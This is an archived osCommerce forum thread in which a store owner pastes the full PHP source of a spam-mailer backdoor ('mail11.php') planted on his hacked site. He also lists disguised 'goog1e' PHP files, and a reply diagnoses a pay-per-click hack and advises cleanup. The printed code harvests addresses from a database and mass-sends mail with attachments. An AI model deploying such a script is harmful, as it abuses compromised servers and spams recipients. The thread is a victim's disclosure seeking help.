Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Some guys hacked my mail! Here is the code they used


Retix

Recommended Posts

Posted

Hi guys well I thought I will like to share this with you guys over there!! Any of you guys have a good program for stopping hacker. I have one but could use a better one??

 

Anys some guys hacked my website and add a fill called mail11.php. The good news is my website is very new so no buyers and trafic to it yet so no harm is done........ Here is the code they used!! In away the last part of the code is funny:

 

 

Chuks Is Great

 

<?

 

 

If ($action=="mysql"){

 

#Grab email addresses de MySQL

 

include "./mysql.info.php";

 

if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){

 

print "Porfavor configure su mysql.info.php en tu MySQL informacion. Todas las opciones requeridas.";

 

exit;

 

}

 

$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Conexion en MySQL Fallida.");

 

mysql_select_db($sqldb, $db) or die("Seleecione su DataBase $sqldb");

 

$result = mysql_query($sqlquery) or die("Secion fallida: $sqlquery");

 

$numrows = mysql_num_rows($result);

 

 

 

for($x=0; $x<$numrows; $x++){

 

$result_row = mysql_fetch_row($result);

 

$oneemail = $result_row[0];

 

$emaillist .= $oneemail."\n";

 

}

 

}

 

 

 

if ($action=="send"){

 

$message = urlencode($message);

 

$message = ereg_replace("%5C%22", "%22", $message);

 

$message = urldecode($message);

$message = stripslashes($message);

$subject = stripslashes($subject);

 

}

 

 

 

?>

 

<form name="form1" method="post" action="" enctype="multipart/form-data">

 

<br>

 

<table width="100%" border="0">

 

<tr>

 

<td width="10%">

 

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

 

Mail:</font></div>

 

</td>

 

<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

 

<input type="text" name="from" value="<? print $from; ?>" size="30">

 

</font></td>

 

<td width="31%">

 

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your

 

Name:</font></div>

 

</td>

 

<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

 

<input type="text" name="realname" value="<? print $realname; ?>" size="30">

 

</font></td>

 

</tr>

 

<tr>

 

<td width="10%">

 

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Repit:</font></div>

 

</td>

 

<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

 

<input type="text" name="replyto" value="<? print $replyto; ?>" size="30">

 

</font></td>

 

<td width="31%">

 

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Upload

 

Txt:</font></div>

 

</td>

 

<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

 

<input type="file" name="file" size="30">

 

</font></td>

 

</tr>

 

<tr>

 

<td width="10%">

 

<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>

 

</td>

 

<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

 

<input type="text" name="subject" value="<? print $subject; ?>" size="90">

 

</font></td>

 

</tr>

 

<tr valign="top">

 

<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

 

<textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>

 

<br>

 

<input type="radio" name="contenttype" value="plain">

 

Plain

 

<input type="radio" name="contenttype" value="html" checked>

 

HTML

 

<input type="hidden" name="action" value="send">

 

<input type="submit" value="Send Emails">

 

</font></td>

 

<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

 

<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>

 

</font></td>

 

</tr>

 

</table>

 

</form>

 

 

 

<?

 

if ($action=="send"){

 

 

 

if (!$from && !$subject && !$message && !$emaillist){

 

print "Porfavor complete todo lo necesario.";

 

exit;

 

}

 

 

 

$allemails = split("\n", $emaillist);

 

$numemails = count($allemails);

 

 

 

#Open the file attachment if any, and base64_encode it for email transport

 

If ($file_name){

 

@copy($file, "./$file_name") or die("El archivo que intestaste subir al servidor, no puede ser copiado");

 

$content = fread(fopen($file,"r"),filesize($file));

 

$content = chunk_split(base64_encode($content));

 

$uid = strtoupper(md5(uniqid(time())));

 

$name = basename($file);

 

}

 

 

 

for($x=0; $x<$numemails; $x++){

 

$to = $allemails[$x];

 

if ($to){

 

$to = ereg_replace(" ", "", $to);

 

$message = ereg_replace("&email&", $to, $message);

 

$subject = ereg_replace("&email&", $to, $subject);

 

print "Sending mail to $to.......";

 

flush();

 

$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

 

$header .= "MIME-Version: 1.0\r\n";

 

If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";

 

If ($file_name) $header .= "--$uid\r\n";

 

$header .= "Content-Type: text/$contenttype\r\n";

 

$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

 

$header .= "$message\r\n";

 

If ($file_name) $header .= "--$uid\r\n";

 

If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";

 

If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";

 

If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";

 

If ($file_name) $header .= "$content\r\n";

 

If ($file_name) $header .= "--$uid--";

 

mail($to, $subject, "", $header);

 

print "ok<br>";

 

flush();

 

}

 

}

 

 

 

}

 

?>

<p align="center"><b>were getting some results guys</b></p>

 

 

WHo`s the best HA!!!!!. </b></p>

 

 

Dont show any mercy</b></p>

 

 

Keep On Bro</b></p>

 

 

By HalT

 

 

 

 

 

 

 

 

 

One thing more these files where also added or hacked in on my web

 

 

goog1e3d1c3b3c6fba74.php

goog1e918d584e6c99c7.php

goog1e_analist_726d5d7b1984ce.php

google_analist_726d5d7b1984ce.php

 

 

as I see them they are from good. should I remove them or is google just tryin to send trafic my was???

Posted

I think you might find its a pay per click hack, you will probably have a folder on your server with a lot of sub folders in it relating to online pills, etc... also i expect you will find a ZIP file with a php file that opens and extracts it

Those files are not google and they are not osCommerce, you are going to have to remove them and any others you find, typically any unprotected folder with out an index, images and the like will have folders in them with an htaccess file and some php file (s) usually with a string of numbers instead of a name.

Once clean you are going to have to look at security as a matter of urgency, look in the security topics on this forum for some advice on which programs to add to your store to make it more secure, also you need to make sure your file / folder permissions are correct

Nic

 

 

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Posted

I think you might find its a pay per click hack, you will probably have a folder on your server with a lot of sub folders in it relating to online pills, etc... also i expect you will find a ZIP file with a php file that opens and extracts it

Those files are not google and they are not osCommerce, you are going to have to remove them and any others you find, typically any unprotected folder with out an index, images and the like will have folders in them with an htaccess file and some php file (s) usually with a string of numbers instead of a name.

Once clean you are going to have to look at security as a matter of urgency, look in the security topics on this forum for some advice on which programs to add to your store to make it more secure, also you need to make sure your file / folder permissions are correct

Nic

 

Hi nice thanks a lot for you advise am working on it right away!! first I have some problem I have to finish with the web-host but should be done in 1-2days so until then I will try to read the security topics right away.

 

thanks alot again

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...